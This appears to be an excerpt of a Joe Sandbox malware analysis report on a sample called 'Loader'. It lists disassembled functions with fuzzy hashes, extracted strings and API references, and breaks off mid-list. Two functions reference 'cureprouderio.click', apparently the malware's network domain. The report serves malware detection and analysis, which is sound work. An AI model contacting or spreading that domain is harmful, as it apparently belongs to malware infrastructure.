Opcode Fuzzy Hash: 9eaaeac1af0046f77bfdce008b90eb0f0d12110f4699f489367c40e366593788
Instruction Fuzzy Hash: DA513576A0C3A18BC335CF3998903E7BBE2AF96704F58896EC4C99B205DA3845058786

Function 0042B963 Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

c`^Z, xrefs: 0042BA6B

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: c`^Z
API String ID: 0-4018570465
Opcode ID: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
Instruction ID: 62403507b67e3add205e3cb6eb23e8c84b81608dc76150191bd4437fa6a5d6a1
Opcode Fuzzy Hash: d783b575065614c62e39edefdac40061046f0ec8c49e4bcc71ff719ed9c249e9
Instruction Fuzzy Hash: 8241477061C3D18BD735CF3994903E7BBE1EB97700F68896DC0C987246DB3844068B96

Function 0042BB66 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

KI, xrefs: 0042BCAA

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KI
API String ID: 0-1977173829
Opcode ID: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
Instruction ID: 91a34f79fce4890eca5ccf24ac22c1236428951ee7d79aa7463c0d4d2c87feab
Opcode Fuzzy Hash: 9817d8d2cd989187cfd65775c6c2d6774b5ae1b7bccca7278f7fa6d8ef7e6c81
Instruction Fuzzy Hash: 9C41F43564C7908AD3358F34D8943EABBF1ABD6300F58866DD4C99B382CB7855069B86

Function 0041B25A Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

q, xrefs: 0041B361

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-4110462503
Opcode ID: fc3bb61bfd94ae5a3fae19a49a936b96d29985acd56f8c40518c59ddd57b5efb
Instruction ID: 93a25755fb4b0333ef7b556c8c5401fcb28c9ec14eb27c0752a44160350e560f
Opcode Fuzzy Hash: fc3bb61bfd94ae5a3fae19a49a936b96d29985acd56f8c40518c59ddd57b5efb
Instruction Fuzzy Hash: AA41583464C340ABC7054B24DC06B6E7BA1AF97B05F04896EF5E18B2E1C7798815CB8B

Function 0042BB60 Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

KI, xrefs: 0042BCAA

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: KI
API String ID: 0-1977173829
Opcode ID: 1cb5d465071201c5d4a5cc368f7d339e4b5fbc63d8b3d73cbb9a409c79d20b7b
Instruction ID: aae285d08021c98cc9ad7b5e59d58feaf1cef8b380b4a0bc2b22dfea0a95e3f8
Opcode Fuzzy Hash: 1cb5d465071201c5d4a5cc368f7d339e4b5fbc63d8b3d73cbb9a409c79d20b7b
Instruction Fuzzy Hash: CF411675A4C7908BD3258F34D8943EABBF1FBC5300F588A6DD4C99B385CB7854069B86

Function 0040C4AE Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

cureprouderio.click, xrefs: 0040C4E4, 0040C524

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: cureprouderio.click
API String ID: 0-2925096321
Opcode ID: b2e33bdc19f01c0d864218a4dc0cc21f643ae0fc09979f94a9809007749323a0
Instruction ID: b8e46fd4180620e8fa4f02fa5b31e0b327415897175f02e2bb6ac1baa248a022
Opcode Fuzzy Hash: b2e33bdc19f01c0d864218a4dc0cc21f643ae0fc09979f94a9809007749323a0
Instruction Fuzzy Hash: 011125346555019AE34DCB34C8E6B7AA363EF43304B64622DD113A32E5DB796816C61C

Function 0041864E Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

v, xrefs: 00418685

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: d255b25c69fcc9c8248d0df40f5e3549dd583127a3b06a41a83426b700faeda1
Instruction ID: 9699c58770c97fb3a7005195816939a3fdc948d4c1fc9f16f5ad9316cf85a81d
Opcode Fuzzy Hash: d255b25c69fcc9c8248d0df40f5e3549dd583127a3b06a41a83426b700faeda1
Instruction Fuzzy Hash: EB11E276D187618BC310CF34C98028FBAE2ABC9315F16892DE4C5A3315D678CD48CB8B

Function 0043E450 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

lhin, xrefs: 0043E460

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: lhin
API String ID: 0-138776974
Opcode ID: 8b26fef1caf86ef8e11393a310a0b5113c05f2ec9044265c383a10711fd843b9
Instruction ID: 7fd97130cce7ea1aa8fbfb12d6e93ce7f630f2e99416a8fc191b46fa008a84d9
Opcode Fuzzy Hash: 8b26fef1caf86ef8e11393a310a0b5113c05f2ec9044265c383a10711fd843b9
Instruction Fuzzy Hash: D0F0E236F742848BD708CFB9CC4226A66E3DB1A204B18D43DC456E3741E128E8014F18

Function 00409EB9 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

cureprouderio.click, xrefs: 00409EBF

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: cureprouderio.click
API String ID: 0-2925096321
Opcode ID: c11dde4bea6cdc3f43d55281e8cc4d938954cac3924490b2dcf7e503bc37ced3
Instruction ID: b0d56012c3d891d04b8b069242e406f0bf4132553d77d7a172f771eb767dd099
Opcode Fuzzy Hash: c11dde4bea6cdc3f43d55281e8cc4d938954cac3924490b2dcf7e503bc37ced3
Instruction Fuzzy Hash: 1CF0A739A502158BCB04CF14C86277773B2EF8A312F046425D547EB392D3788C40C7A9

Function 0043DB10 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

/lmb, xrefs: 0043DB25

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: /lmb
API String ID: 0-3946268590
Opcode ID: b2d4435d6592d3df5b43c8a07f37ef4b00b2396ced98faf09dab045db6f26371
Instruction ID: a5e828aa6f98702fee6d9b5aa253f0e325b3382cd617644059fa6236e749b797
Opcode Fuzzy Hash: b2d4435d6592d3df5b43c8a07f37ef4b00b2396ced98faf09dab045db6f26371
Instruction Fuzzy Hash: C2F06579A449C58BDB54CF38ADB52B777F0E74B215F1029B8C602E36A0DA7098518A0C

Function 004073F0 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ca138e8e61109462f19737de04b8d039f2d35e56ca922e3c7f9b6a441abc5a
Instruction ID: 6faf0af17566aac506bc1040dc481aed4187c46a203c2ba552b46565fbfeed05
Opcode Fuzzy Hash: 29ca138e8e61109462f19737de04b8d039f2d35e56ca922e3c7f9b6a441abc5a
Instruction Fuzzy Hash: 2922A272A087118BC725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47

Function 0043F730 Relevance: .6, Instructions: 579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d53a1485c9af1d75df7a3ff55b9b87dfe617749fb47fde82fc328e9d4b398f8
Instruction ID: 9440bc60363055fc7741ad62e826ac52b0005078bc596843184142e62853e9a9
Opcode Fuzzy Hash: 8d53a1485c9af1d75df7a3ff55b9b87dfe617749fb47fde82fc328e9d4b398f8
Instruction Fuzzy Hash: 98022576A58211CFC708CF38D89056AB7E2FB8E310F0A857DD985D7361EA35AC15CB85

Function 004058D0 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706edc3a786295cd9b7db35b8e16aa02d11b2287f3acf26f8c1a695ff84f42ae
Instruction ID: d1bd641e04ddd3f8c80cfe45303f140b1f3ce863c723953b48f0dca61e0ef25d
Opcode Fuzzy Hash: 706edc3a786295cd9b7db35b8e16aa02d11b2287f3acf26f8c1a695ff84f42ae
Instruction Fuzzy Hash: D9F1F0356087418FD724CF29C88162BFBE6EFD9304F48882EE4C987791E679E804CB56

Function 004163C0 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9cad568b11121c154bad12ef47db6900822e1f5151d61a13d7de090968f692f
Instruction ID: d7541f2fca1ccae41e83f46ef6531090e0b4554b2222c138a89db1d633840617
Opcode Fuzzy Hash: d9cad568b11121c154bad12ef47db6900822e1f5151d61a13d7de090968f692f
Instruction Fuzzy Hash: 52A17875A083408FD7158F38D8817BBBBE2EB9B318F09457ED4D997292D638C941CB1A

Function 00440180 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1764b8be42eb86bb9f4620744e48ded1e75189da67836bc67bee5a72cb3ea6f3
Instruction ID: c9d4c165c56bfbf3c03a271f9fb192967cfd025fb11622c30a046a2f8b83f669
Opcode Fuzzy Hash: 1764b8be42eb86bb9f4620744e48ded1e75189da67836bc67bee5a72cb3ea6f3
Instruction Fuzzy Hash: 618106352443019BE7249F18D480A2FB7E2FFD9750F15846DEA859B391DB38DC61C78A

Function 0043CEA0 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e28be7b75410f075c26fcddfdb7d548f0538016a9353fd7724876d478ba0bf56
Instruction ID: f9dc6b06319712505be0b00d1611807c54d1d8e9fe27d53802d70cc7455a1389
Opcode Fuzzy Hash: e28be7b75410f075c26fcddfdb7d548f0538016a9353fd7724876d478ba0bf56
Instruction Fuzzy Hash: 1E81A57460D3428FC719CF29C49062EBBE2AFC9314F18866EE4E587382D639D846CB56

Function 0042B215 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9dd72832e23b2b70cc6ebba476d32fddb174955166605a8e5e5476f3b589601
Instruction ID: 74bc6ab1bbaf3b69a7a1375347432e2d302a30213048b9414b69be7e4a431046
Opcode Fuzzy Hash: f9dd72832e23b2b70cc6ebba476d32fddb174955166605a8e5e5476f3b589601
Instruction Fuzzy Hash: 5A415CB5A0D3A58BD3358B2898643B7BFD0DFA3304F28089EE8DA57351D779480587D6

Function 0040AF23 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65cbdfa24d642580817c22312a4d4416be34adb8d03870b701ba4631b34f5032
Instruction ID: eed30cc65e9a7acdb6177f5dd8ded5a2b05ec64c6f0e7533b6fe5fd470de70e5
Opcode Fuzzy Hash: 65cbdfa24d642580817c22312a4d4416be34adb8d03870b701ba4631b34f5032
Instruction Fuzzy Hash: BE51F039254B01CFCB298F64DC95B1ABBB2FF4A311F04847DE55687A62C738E816CB15

Function 0040D907 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224b885b2d33e1646e8711822722071e2e6a455e5a6b5f8b883611f4457d948c
Instruction ID: 9e15d2c07ce86351c6ebb163d7bbc7b39beeeef97fa94347135c7c3a5bbe2237
Opcode Fuzzy Hash: 224b885b2d33e1646e8711822722071e2e6a455e5a6b5f8b883611f4457d948c
Instruction Fuzzy Hash: 7641C8356147018FC729CF68C991962BBE2FB8A314318D66EC5A6C7795C638E846CB48

Function 00418DC5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519c7b1d929cf06ac58c773f830ddbc472e0c9eb742fe59324e356552328b5b0
Instruction ID: 52f43bb69bf967e13d8b8cf2b488c67a51938e76d39e84f9618a723eb99c5912
Opcode Fuzzy Hash: 519c7b1d929cf06ac58c773f830ddbc472e0c9eb742fe59324e356552328b5b0
Instruction Fuzzy Hash: F94126B5908380DFE3309B259C417ABB7A6EB93308F18493DE895532A2DF359815CB5B

Function 00418F52 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ff31274707ca65935b0076e1da50561794554b8f4a8f1593c33844884775f5
Instruction ID: 99084ae7948e4e969f5cab21ab752441f84075a4ec3b964ea1b353b24493650c
Opcode Fuzzy Hash: e4ff31274707ca65935b0076e1da50561794554b8f4a8f1593c33844884775f5
Instruction Fuzzy Hash: 7621B0705082418BD7258B28C8B17F777F0EF9B324F085A9DD8D68B392E7389845C71A

Function 0043D325 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643e9d03ab5afcafe616b615b53e5a37d48034b3075b442a74698f38aaaabc60
Instruction ID: ecce191509777419fe2065107418a7e373d2744f15f7fbda99c47c06ac08e1c0
Opcode Fuzzy Hash: 643e9d03ab5afcafe616b615b53e5a37d48034b3075b442a74698f38aaaabc60
Instruction Fuzzy Hash: 3B31EDB5D102428FDB04CF74EC525AABFB1FB1B314F48647EC481AB262D6399885CF98

Function 004167E1 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0606199e92ee5f98f37b4575949366b277766458398aec2d8c18da042f17e8e
Instruction ID: 7b77d76e57314b8d537e66dbda0905c5b71d9ff5251147711cb921c64f52ab4a
Opcode Fuzzy Hash: c0606199e92ee5f98f37b4575949366b277766458398aec2d8c18da042f17e8e
Instruction Fuzzy Hash: 70114C746493009BDB25AB1898D09777762EBD6328F15193ED09217262D334DCD3CB0E

Function 00416896 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 655e66a32f0ec6ef73855cb929e808cb87c538b78d40acdce1f821a373a6cf25
Instruction ID: 49c952b68e76756303a7cfa84cb587e570531a8abc643f2441ca8aaef1216cf7
Opcode Fuzzy Hash: 655e66a32f0ec6ef73855cb929e808cb87c538b78d40acdce1f821a373a6cf25
Instruction Fuzzy Hash: 1A1151386493408BD7299B2584D05BBB7A1EBDA338F25172EC096532A1C738DCD7CB0E

Function 0041598C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd517cc4091c0d14983317d9fc9f51e9ee4e013ad9cff62941fad828ef40864f
Instruction ID: 61a3990d51287a321700371caea8ac95de16791a53993df06537a25f78a5eb73
Opcode Fuzzy Hash: fd517cc4091c0d14983317d9fc9f51e9ee4e013ad9cff62941fad828ef40864f
Instruction Fuzzy Hash: 5C01D674A98740DBD3708B189581AEBB7B5FBCA324F545B2DD0C593250D634D892CB8E

Function 00435F00 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5939802b1301af77679c215306a21a7299ef6c9da27cc0b365f9f239b0c19f2f
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 6C110833B055D50EC3168D3C8400565BFA30AA7234F6D93DAF4B89B2D6D6278D8B8399

Function 00429E80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae974aa015cb9a2e7ca8e05bc068c22be5d530372e1f024b1e298d7d6b666928
Instruction ID: a27733a69205e04c464837f65cce1e328396de0a29cbbd258d365049883dbe47
Opcode Fuzzy Hash: ae974aa015cb9a2e7ca8e05bc068c22be5d530372e1f024b1e298d7d6b666928
Instruction Fuzzy Hash: 7401B1F1B0031257DB20DF51A4C0727B2A9AF84708F4A453EE8485B382EB7DFC08C69A

Function 0042C89E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41aecbbb57f341e3239aeda4c52079f99c77c3874fd3ef38ef81509e98e606fa
Instruction ID: 94a2685e38f00eaf1eb05f0091b19f393d3aa0123d7ed6f17fd2bfd551075456
Opcode Fuzzy Hash: 41aecbbb57f341e3239aeda4c52079f99c77c3874fd3ef38ef81509e98e606fa
Instruction Fuzzy Hash: 9911E0727493000BE704CE3AA89016BFBE3AFD3214F2E983DD182C7725D93588078B4A

Function 004158FC Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7623d2961ef6c419805eac7e58d1c86d9daee92fdb993515a560874ec6750ddb
Instruction ID: fb47be4d804a9da23881eaf03f8acb819a2e87175e2b70562f1e2f5772406857
Opcode Fuzzy Hash: 7623d2961ef6c419805eac7e58d1c86d9daee92fdb993515a560874ec6750ddb
Instruction Fuzzy Hash: C30126B4664700DBEB248B259C51BB7B7A1E7CA334F541A2DE0C2A31A1C6249890CA1F

Function 00402B70 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec352bbe4cbc42230a0051b4d6dd25082a105aad7c4e020716a29c2d8aeb373
Instruction ID: 21743fce8f8fc89d95ce078a34e0e0e5e44fc2aba6199b741040941cf27e962f
Opcode Fuzzy Hash: 0ec352bbe4cbc42230a0051b4d6dd25082a105aad7c4e020716a29c2d8aeb373
Instruction Fuzzy Hash: 1CF0467B71821D0BD310DDA9FCC4577B3A6EBD5204B0A4139EA40A3381E8F4F80592A4

Function 0040B3BB Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17bcfa2246879958e6deeecfb3dd30fbf363363fe0cdfdf4ccd092ee3f1ec607
Instruction ID: 467d839b1f2edd79695e981d77696c97d4829d5b404480f02d90e7557cfed571
Opcode Fuzzy Hash: 17bcfa2246879958e6deeecfb3dd30fbf363363fe0cdfdf4ccd092ee3f1ec607
Instruction Fuzzy Hash: AD1192B09007029FE3649F19C899712FAB4BB06324F50978CE0695E6D2C3BAD589CFD5

Function 0043F286 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7745721efb1b8d97eb5a387c513d230e70c93acfe341ed94793c9456cf5d554e
Instruction ID: 01548a179f3559cfb04f008a038ad398e0644e2916ec8190e41f8619e0e1dcf3
Opcode Fuzzy Hash: 7745721efb1b8d97eb5a387c513d230e70c93acfe341ed94793c9456cf5d554e
Instruction Fuzzy Hash: FFE02BBAF480108B530CCF16D8505B073E2A3CB311704E03CD44AD7311C931DC12560D

Function 00417A75 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
Instruction ID: 71cc694b795eba117cf9378a5a53a8597336b0837f4540bad7c117c05afde082
Opcode Fuzzy Hash: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
Instruction Fuzzy Hash: DDD05E359142049AC7008F2DA500919B7F0EBC7750F00A52DB448E72A9CB71C8019709

Function 00424F80 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
Instruction ID: d02d98b6c4407079e00ef93f935acfea29071d225d302e4f93154c128f20d5d8
Opcode Fuzzy Hash: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
Instruction Fuzzy Hash: FAB0127090C10087D504CF08C450470F378D747215F003418D00AB3102C310E800CA0C

Function 0043234E Relevance: 75.4, APIs: 1, Strings: 42, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00432400

Strings

", xrefs: 004324CB
G, xrefs: 004324F3
, xrefs: 0043242D
/, xrefs: 00432423
i, xrefs: 0043241E
k, xrefs: 00432428
E, xrefs: 004324E3
W, xrefs: 00432473
+, xrefs: 004325AB
+, xrefs: 00432437
<, xrefs: 0043246B
:, xrefs: 00432370
', xrefs: 0043254B
o, xrefs: 0043243C
*, xrefs: 0043257B
=, xrefs: 0043235C
m, xrefs: 00432432
6, xrefs: 004325CB
U, xrefs: 00432463
H, xrefs: 0043237A
Q, xrefs: 00432446
O, xrefs: 00432533
C, xrefs: 004324D3
S, xrefs: 00432361
K, xrefs: 00432513
M, xrefs: 0043236B
[, xrefs: 00432493
I, xrefs: 0043237F
8, xrefs: 0043247B
_, xrefs: 004324B3
S, xrefs: 00432453
A, xrefs: 004324C3
M, xrefs: 00432523
=, xrefs: 00432366
", xrefs: 0043253B
Y, xrefs: 00432483
', xrefs: 0043255B
4, xrefs: 0043245B
], xrefs: 004324A3
O, xrefs: 00432375
0, xrefs: 00432656
I, xrefs: 00432503

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
API String ID: 2525500382-871300800
Opcode ID: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
Instruction ID: cf4270bf8ffc7a5f823e8d7e11b60e879aec5e144cc898fab687690e48e742b5
Opcode Fuzzy Hash: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
Instruction Fuzzy Hash: 9291066150C7C1CDE3368638845879BBED11BA7218F088AADD5ED8B2D3C7BA4509CB67

Function 00432019 Relevance: 75.4, APIs: 1, Strings: 42, Instructions: 159memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004320CE

Strings

I, xrefs: 0043204D
k, xrefs: 004320F6
i, xrefs: 004320EC
=, xrefs: 00432034
W, xrefs: 00432141
O, xrefs: 00432043
o, xrefs: 0043210A
*, xrefs: 00432249
6, xrefs: 00432299
, xrefs: 004320FB
[, xrefs: 00432161
C, xrefs: 004321A1
S, xrefs: 00432121
m, xrefs: 00432100
K, xrefs: 004321E1
', xrefs: 00432219
+, xrefs: 00432105
Y, xrefs: 00432151
Q, xrefs: 00432114
", xrefs: 00432209
=, xrefs: 0043202A
M, xrefs: 00432039
O, xrefs: 00432201
:, xrefs: 0043203E
", xrefs: 00432199
G, xrefs: 004321C1
/, xrefs: 004320F1
